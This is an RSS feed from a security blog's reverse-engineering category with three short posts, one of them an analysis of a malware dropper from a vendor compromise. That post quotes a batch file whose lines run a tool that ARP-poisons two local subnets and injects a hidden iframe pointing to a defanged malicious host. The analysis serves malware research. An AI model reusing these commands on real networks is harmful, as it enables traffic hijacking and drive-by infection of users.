<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>ICMPECHO &#187; reverse engineering</title>
	<atom:link href="http://www.icmpecho.com/category/reverse-engineering/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.icmpecho.com</link>
	<description>More than your usual type 8's</description>
	<pubDate>Thu, 20 Nov 2008 00:53:32 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.3</generator>
	<language>en</language>
			<item>
		<title>From my stats&#8230;</title>
		<link>http://www.icmpecho.com/2008/10/08/from-my-stats/</link>
		<comments>http://www.icmpecho.com/2008/10/08/from-my-stats/#comments</comments>
		<pubDate>Wed, 08 Oct 2008 22:21:23 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[personal]]></category>

		<category><![CDATA[reverse engineering]]></category>

		<category><![CDATA[reverse engineer]]></category>

		<category><![CDATA[spotify]]></category>

		<category><![CDATA[stream]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/?p=774</guid>
		<description><![CDATA[&#8230; of search terms that got people to my page:

Seems like people are trying to find a way to suck music out of Spotify 
]]></description>
			<content:encoded><![CDATA[<p>&#8230; of search terms that got people to my page:</p>
<p><img src="http://www.icmpecho.com/images/jing/2008-10-09_0018.png" alt="Reverse Engineer Spotify" border=1/></p>
<p>Seems like people are trying to find a way to suck music out of <a href="http://www.icmpecho.com/2008/10/07/spotify-best-alternative-to-piracy-so-far/">Spotify</a> <img src='http://www.icmpecho.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2008/10/08/from-my-stats/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Smart move&#8230;</title>
		<link>http://www.icmpecho.com/2007/11/26/smart-move/</link>
		<comments>http://www.icmpecho.com/2007/11/26/smart-move/#comments</comments>
		<pubDate>Mon, 26 Nov 2007 01:10:45 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[malware]]></category>

		<category><![CDATA[networking]]></category>

		<category><![CDATA[reverse engineering]]></category>

		<category><![CDATA[ARP-Poisoning]]></category>

		<category><![CDATA[chinese]]></category>

		<category><![CDATA[CISRT]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/2007/11/26/smart-move/</guid>
		<description><![CDATA[&#8230; by the bad guys unfortunately  
When investigating one of the files that was being downloaded by the initial dropper from the Kirisun hack I found something very interesting. I do not know if this is a known technique, but it is new to me. The file I was looking at was the &#8220;24.exe&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p><strong>&#8230; by the bad guys unfortunately <img src='http://www.icmpecho.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </strong></p>
<p>When investigating one of the files that was being downloaded by the initial dropper from the <a target="_blank" href="http://www.icmpecho.com/2007/11/22/wireless-communication-vendor-kirisun-hacked/">Kirisun hack </a>I found something very interesting. I do not know if this is a known technique, but it is new to me. The file I was looking at was the &#8220;24.exe&#8221; and the reason for choosing that one were:</p>
<ol>
<li>Easy <img src='http://www.icmpecho.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Self-extracting RAR, no encryption and no sandbox detection.</li>
<li>It was one of the largest files == lot&#8217;s of goodies?</li>
</ol>
<p>After running the self-extracting RAR in the sandbox I ended up with the following files in c:\windows\system32\:</p>
<p><img border="0" width="372" src="http://www.icmpecho.com/images/mwimg/24execontents.jpg" alt="Contents" height="202" /></p>
<p>Inside the &#8220;drivers&#8221; folder a copy of <a target="_blank" href="http://www.winpcap.org/">npf.sys</a> was dropped. This file belongs to the WinPcap project and so does some of the other files that were extracted.</p>
<p>The file that was supposed to auto start after decompression was &#8220;3.vbs&#8221; whose only job was to silently run &#8220;run.bat&#8221; which contained the following two lines:</p>
<address><font color="#ffcc99">Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert &#8220;&lt;iframe src=&#8217;hxxp://5.xqhgm.com/2.htm&#8217; width=20 height=1&gt;&lt;/iframe&gt;&#8221;<br />
Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert &#8220;&lt;iframe src=&#8217;hxxp://5.xqhgm.com/2.htm&#8217; width=20 height=1&gt;&lt;/iframe&gt;&#8221;<br />
exit</font></address>
<p>Ok, then what do our little friend Vml.exe do with these parameters I thought? After asking my friend Google I got the answer that I thought I would get, it was performing ARP poisoning on the local network (well, just the two subnets specified in the .bat) and inserting iframes into all websites being viewed. <a target="_blank" href="http://www.cisrt.org/enblog/read.php?189" title="CISRT info on auto-ARP-poison">Previously discovered by CISRT</a> earlier in November.</p>
<p><strong>Genious!</strong> One point to the bad guys!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2007/11/26/smart-move/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Reverse engineering mentoring wiki</title>
		<link>http://www.icmpecho.com/2007/11/09/reverse-engineering-mentoring-wiki/</link>
		<comments>http://www.icmpecho.com/2007/11/09/reverse-engineering-mentoring-wiki/#comments</comments>
		<pubDate>Fri, 09 Nov 2007 12:38:19 +0000</pubDate>
		<dc:creator>Daniel Nyström</dc:creator>
		
		<category><![CDATA[programming]]></category>

		<category><![CDATA[reverse engineering]]></category>

		<guid isPermaLink="false">http://www.icmpecho.com/2007/11/09/reverse-engineering-mentoring-wiki/</guid>
		<description><![CDATA[Just a little linktip:
http://blog.didierstevens.com/2007/02/12/reverse-engineering-mentoring/
For those of us that is not yet fluent in assembler (but some programming experience in C is preferred if you ask me) this is a great place to start.
Doesn&#8217;t seem to have been updated lately, but I think it&#8217;s great beginners info anyway.
]]></description>
			<content:encoded><![CDATA[<p>Just a little linktip:</p>
<p><a href="http://blog.didierstevens.com/2007/02/12/reverse-engineering-mentoring/" target="_blank">http://blog.didierstevens.com/2007/02/12/reverse-engineering-mentoring/</a></p>
<p>For those of us that is not yet fluent in assembler (but some programming experience in C is preferred if you ask me) this is a great place to start.</p>
<p>Doesn&#8217;t seem to have been updated lately, but I think it&#8217;s great beginners info anyway.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.icmpecho.com/2007/11/09/reverse-engineering-mentoring-wiki/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
